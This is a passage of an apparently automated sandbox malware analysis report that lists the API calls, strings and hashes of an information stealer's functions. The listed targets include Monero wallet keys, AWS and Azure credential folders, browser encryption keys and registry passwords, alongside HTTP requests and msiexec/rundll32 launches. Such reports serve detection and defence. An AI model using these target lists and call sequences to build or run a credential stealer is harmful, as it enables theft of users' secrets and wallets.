                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 2ef05ec998c9ff54e72b09bf0b90c317d682214f36bd9c14deaf29f43c70740d
                          • Instruction ID: b912257055fefb209113b259eaae4d84b63d542d14bf334d20e3f34c21c99868
                          • Opcode Fuzzy Hash: 2ef05ec998c9ff54e72b09bf0b90c317d682214f36bd9c14deaf29f43c70740d
                          • Instruction Fuzzy Hash: B3E10F72910108ABCB05FBA0DD96EEE777CBF65301F508158F10BA70A1DF35AA06CB62
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00CCDA00,00000000,?,0018144C,00000000,?,?), ref: 0016CA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0016CA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0016CA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0016CAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0016CAD9
                          • StrStrA.SHLWAPI(?,00CCD9A0,00180B52), ref: 0016CAF7
                          • StrStrA.SHLWAPI(00000000,00CCD9D0), ref: 0016CB1E
                          • StrStrA.SHLWAPI(?,00CCE358,00000000,?,00181458,00000000,?,00000000,00000000,?,00CC9308,00000000,?,00181454,00000000,?), ref: 0016CCA2
                          • StrStrA.SHLWAPI(00000000,00CCE0D8), ref: 0016CCB9
                            • Part of subcall function 0016C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0016C871
                            • Part of subcall function 0016C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0016C87C
                          • StrStrA.SHLWAPI(?,00CCE0D8,00000000,?,0018145C,00000000,?,00000000,00CC9348), ref: 0016CD5A
                          • StrStrA.SHLWAPI(00000000,00CC9288), ref: 0016CD71
                            • Part of subcall function 0016C820: lstrcat.KERNEL32(?,00180B46), ref: 0016C943
                            • Part of subcall function 0016C820: lstrcat.KERNEL32(?,00180B47), ref: 0016C957
                            • Part of subcall function 0016C820: lstrcat.KERNEL32(?,00180B4E), ref: 0016C978
                          • lstrlen.KERNEL32(00000000), ref: 0016CE44
                          • CloseHandle.KERNEL32(00000000), ref: 0016CE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: c07fcefeeac3cce2cbdfceb57206693943d3a5af90b9af7649d50aa9c539bd8f
                          • Instruction ID: 6d2ef0cd48fcdbc3ab0f32509895f2f8a994eb64270ad69cfdcbb41d8bfa130f
                          • Opcode Fuzzy Hash: c07fcefeeac3cce2cbdfceb57206693943d3a5af90b9af7649d50aa9c539bd8f
                          • Instruction Fuzzy Hash: E8E1F172D00108ABDB15EBA4DC95FEEB77CAF64301F808159F11A67191EF306A4ACF62
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • RegOpenKeyExA.ADVAPI32(00000000,00CC9048,00000000,00020019,00000000,001805B6), ref: 001783A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00178426
                          • wsprintfA.USER32 ref: 00178459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0017847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0017848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00178499
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: 81157298a5af7b023f187d419541d12ec20cb9b45d6aa978daba154c96f42a75
                          • Instruction ID: 545c6604400330c6afa731073b92595498ff7ff953d8977bd89566593065df5a
                          • Opcode Fuzzy Hash: 81157298a5af7b023f187d419541d12ec20cb9b45d6aa978daba154c96f42a75
                          • Instruction Fuzzy Hash: 9D811C72950118ABDB69DB64CC95FEE77BCBF58700F40C298E109A6140DF716B89CFA1
                          APIs
                            • Part of subcall function 00178DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00178E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00174DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00174DCD
                            • Part of subcall function 00174910: wsprintfA.USER32 ref: 0017492C
                            • Part of subcall function 00174910: FindFirstFileA.KERNEL32(?,?), ref: 00174943
                          • lstrcat.KERNEL32(?,00000000), ref: 00174E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00174E59
                            • Part of subcall function 00174910: StrCmpCA.SHLWAPI(?,00180FDC), ref: 00174971
                            • Part of subcall function 00174910: StrCmpCA.SHLWAPI(?,00180FE0), ref: 00174987
                            • Part of subcall function 00174910: FindNextFileA.KERNEL32(000000FF,?), ref: 00174B7D
                            • Part of subcall function 00174910: FindClose.KERNEL32(000000FF), ref: 00174B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00174EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00174EE5
                            • Part of subcall function 00174910: wsprintfA.USER32 ref: 001749B0
                            • Part of subcall function 00174910: StrCmpCA.SHLWAPI(?,001808D2), ref: 001749C5
                            • Part of subcall function 00174910: wsprintfA.USER32 ref: 001749E2
                            • Part of subcall function 00174910: PathMatchSpecA.SHLWAPI(?,?), ref: 00174A1E
                            • Part of subcall function 00174910: lstrcat.KERNEL32(?,00CCFAF8), ref: 00174A4A
                            • Part of subcall function 00174910: lstrcat.KERNEL32(?,00180FF8), ref: 00174A5C
                            • Part of subcall function 00174910: lstrcat.KERNEL32(?,?), ref: 00174A70
                            • Part of subcall function 00174910: lstrcat.KERNEL32(?,00180FFC), ref: 00174A82
                            • Part of subcall function 00174910: lstrcat.KERNEL32(?,?), ref: 00174A96
                            • Part of subcall function 00174910: CopyFileA.KERNEL32(?,?,00000001), ref: 00174AAC
                            • Part of subcall function 00174910: DeleteFileA.KERNEL32(?), ref: 00174B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 16cbe024e55e045bd090166d21bb8c1a87324f5f7655523334538067f642d74e
                          • Instruction ID: 5c2a964a784928bf69a0ec2db249d42008ddcb7276361c238c75c4f4e1f1964d
                          • Opcode Fuzzy Hash: 16cbe024e55e045bd090166d21bb8c1a87324f5f7655523334538067f642d74e
                          • Instruction Fuzzy Hash: 5041717A94020867CB64F770DC47FED773CAB65701F408894B689A60C1EFB457C98B92
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0017906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: a6bb298578f9a96dfcc684d776723dfeb12ea32199b2507adb55a5183c47bf71
                          • Instruction ID: 44109498f516a38f9208ca29464c1b127ed87e1953355a72d1a706ab62520227
                          • Opcode Fuzzy Hash: a6bb298578f9a96dfcc684d776723dfeb12ea32199b2507adb55a5183c47bf71
                          • Instruction Fuzzy Hash: A971CA76910608ABDB04EBE4DC89FEEB7BDAB49700F148508F516A7290DB35A905CB61
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 001731C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0017335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 001734EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: 36330ecc7aba4355718f21c469ba21dd6de367f0bb4f2ffb16bb84175489f110
                          • Instruction ID: ab4c0bb6aeb3a451e9f454c7f78a8ede25ea4488de03f5d6c1c4004ba1fbe901
                          • Opcode Fuzzy Hash: 36330ecc7aba4355718f21c469ba21dd6de367f0bb4f2ffb16bb84175489f110
                          • Instruction Fuzzy Hash: 1B1214718501089ADB19FBA0DC92FEEB778AF64301F90C159F51A76191EF342B4ACF92
                          APIs
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 00166280: InternetOpenA.WININET(00180DFE,00000001,00000000,00000000,00000000), ref: 001662E1
                            • Part of subcall function 00166280: StrCmpCA.SHLWAPI(?,00CCFC38), ref: 00166303
                            • Part of subcall function 00166280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00166335
                            • Part of subcall function 00166280: HttpOpenRequestA.WININET(00000000,GET,?,00CCF4B8,00000000,00000000,00400100,00000000), ref: 00166385
                            • Part of subcall function 00166280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001663BF
                            • Part of subcall function 00166280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001663D1
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00175318
                          • lstrlen.KERNEL32(00000000), ref: 0017532F
                            • Part of subcall function 00178E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00178E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00175364
                          • lstrlen.KERNEL32(00000000), ref: 00175383
                          • lstrlen.KERNEL32(00000000), ref: 001753AE
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 5e5402087a4c6e9365410456de86b08f36584c13ff0fee14590ef73951c5e7a0
                          • Instruction ID: 43872cc9634e8e82d2bf7bd41c3bc41bcb12ecca7234497fa2b30db2736a6c75
                          • Opcode Fuzzy Hash: 5e5402087a4c6e9365410456de86b08f36584c13ff0fee14590ef73951c5e7a0
                          • Instruction Fuzzy Hash: 6651F171910148ABCB18FF60CD96AEE7779AF60301F908018F41E9B591EF756B46CBA3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 0e388b9c5641f3088d9a6f8c629f0837ba5b4f607ec31e6f25004b33c2fd05db
                          • Instruction ID: 307e135877fe77890ebd7939f7e0b6501447e22e87f676eaadb6819aa17056a5
                          • Opcode Fuzzy Hash: 0e388b9c5641f3088d9a6f8c629f0837ba5b4f607ec31e6f25004b33c2fd05db
                          • Instruction Fuzzy Hash: 8CC154B6940119ABCB14EF60DC89FEE7778BFA4304F108598E50EA7141DB70AA85CF91
                          APIs
                            • Part of subcall function 00178DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00178E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 001742EC
                          • lstrcat.KERNEL32(?,00CCF2D8), ref: 0017430B
                          • lstrcat.KERNEL32(?,?), ref: 0017431F
                          • lstrcat.KERNEL32(?,00CCD7F0), ref: 00174333
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 00178D90: GetFileAttributesA.KERNEL32(00000000,?,00161B54,?,?,0018564C,?,?,00180E1F), ref: 00178D9F
                            • Part of subcall function 00169CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00169D39
                            • Part of subcall function 001699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001699EC
                            • Part of subcall function 001699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00169A11
                            • Part of subcall function 001699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00169A31
                            • Part of subcall function 001699C0: ReadFile.KERNEL32(000000FF,?,00000000,0016148F,00000000), ref: 00169A5A
                            • Part of subcall function 001699C0: LocalFree.KERNEL32(0016148F), ref: 00169A90
                            • Part of subcall function 001699C0: CloseHandle.KERNEL32(000000FF), ref: 00169A9A
                            • Part of subcall function 001793C0: GlobalAlloc.KERNEL32(00000000,001743DD,001743DD), ref: 001793D3
                          • StrStrA.SHLWAPI(?,00CCF560), ref: 001743F3
                          • GlobalFree.KERNEL32(?), ref: 00174512
                            • Part of subcall function 00169AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00164EEE,00000000,00000000), ref: 00169AEF
                            • Part of subcall function 00169AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00164EEE,00000000,?), ref: 00169B01
                            • Part of subcall function 00169AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00164EEE,00000000,00000000), ref: 00169B2A
                            • Part of subcall function 00169AC0: LocalFree.KERNEL32(?,?,?,?,00164EEE,00000000,?), ref: 00169B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 001744A3
                          • StrCmpCA.SHLWAPI(?,001808D1), ref: 001744C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 001744D2
                          • lstrcat.KERNEL32(00000000,?), ref: 001744E5
                          • lstrcat.KERNEL32(00000000,00180FB8), ref: 001744F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: a99184f3737ddd7253fe8328c2d842355cbbbd5ab4f840538c9501fe99fa3fc6
                          • Instruction ID: f28cb05ba87508b155837ca6b1d6c653d91b7dc65db18f7de1fcf58568d9952a
                          • Opcode Fuzzy Hash: a99184f3737ddd7253fe8328c2d842355cbbbd5ab4f840538c9501fe99fa3fc6
                          • Instruction Fuzzy Hash: 5F7178B6900218ABCB15EBA0DC85FEE777DAF99300F008598F60997181EB35DB59CF91
                          APIs
                            • Part of subcall function 001612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001612B4
                            • Part of subcall function 001612A0: RtlAllocateHeap.NTDLL(00000000), ref: 001612BB
                            • Part of subcall function 001612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001612D7
                            • Part of subcall function 001612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001612F5
                            • Part of subcall function 001612A0: RegCloseKey.ADVAPI32(?), ref: 001612FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0016134F
                          • lstrlen.KERNEL32(?), ref: 0016135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00161377
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 00178B60: GetSystemTime.KERNEL32(00180E1A,00CCEEF0,001805AE,?,?,001613F9,?,0000001A,00180E1A,00000000,?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 00178B86
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00161465
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001699EC
                            • Part of subcall function 001699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00169A11
                            • Part of subcall function 001699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00169A31
                            • Part of subcall function 001699C0: ReadFile.KERNEL32(000000FF,?,00000000,0016148F,00000000), ref: 00169A5A
                            • Part of subcall function 001699C0: LocalFree.KERNEL32(0016148F), ref: 00169A90
                            • Part of subcall function 001699C0: CloseHandle.KERNEL32(000000FF), ref: 00169A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 001614EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: cf0fae3c501397a42055c0bebed9e616e3faa19e5668c6ab731b5d8119fb4e2d
                          • Instruction ID: e886235cc2f3e6adf73a35e569c79a70b748ed4515f8d020142a1a90ef9475e3
                          • Opcode Fuzzy Hash: cf0fae3c501397a42055c0bebed9e616e3faa19e5668c6ab731b5d8119fb4e2d
                          • Instruction Fuzzy Hash: 585113B195011957CB55FB60DD92FEE737CAF64301F8085A8B60EA2091EF305B89CFA6
                          APIs
                            • Part of subcall function 001672D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0016733A
                            • Part of subcall function 001672D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001673B1
                            • Part of subcall function 001672D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0016740D
                            • Part of subcall function 001672D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00167452
                            • Part of subcall function 001672D0: HeapFree.KERNEL32(00000000), ref: 00167459
                          • lstrcat.KERNEL32(00000000,001817FC), ref: 00167606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00167648
                          • lstrcat.KERNEL32(00000000, : ), ref: 0016765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0016768F
                          • lstrcat.KERNEL32(00000000,00181804), ref: 001676A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 001676D3
                          • lstrcat.KERNEL32(00000000,00181808), ref: 001676ED
                          • task.LIBCPMTD ref: 001676FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: d348c0bbf71292b84e38a873d4a575c95e0c630f175a1441746646e9cdb36dfa
                          • Instruction ID: 73163f911d253c5a4fbab1e2cae34ceb7f6f441faa412c79828502dfd1bd9dc1
                          • Opcode Fuzzy Hash: d348c0bbf71292b84e38a873d4a575c95e0c630f175a1441746646e9cdb36dfa
                          • Instruction Fuzzy Hash: 59316B72900509EFCB09EBA8DC95DFE777DAB56302F144118F102A72A0DB38A946CF52
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00CCF158,00000000,?,00180E2C,00000000,?,00000000), ref: 00178130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00178137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00178158
                          • __aulldiv.LIBCMT ref: 00178172
                          • __aulldiv.LIBCMT ref: 00178180
                          • wsprintfA.USER32 ref: 001781AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: 4f3bccd192d3006b25f865db2d9274b98a4d051e7ebeeb31f5111d3880098395
                          • Instruction ID: 592d36df82451bc678d8c42c15f474492aa752d4bd769e4b0ec9780bc2a8cecd
                          • Opcode Fuzzy Hash: 4f3bccd192d3006b25f865db2d9274b98a4d051e7ebeeb31f5111d3880098395
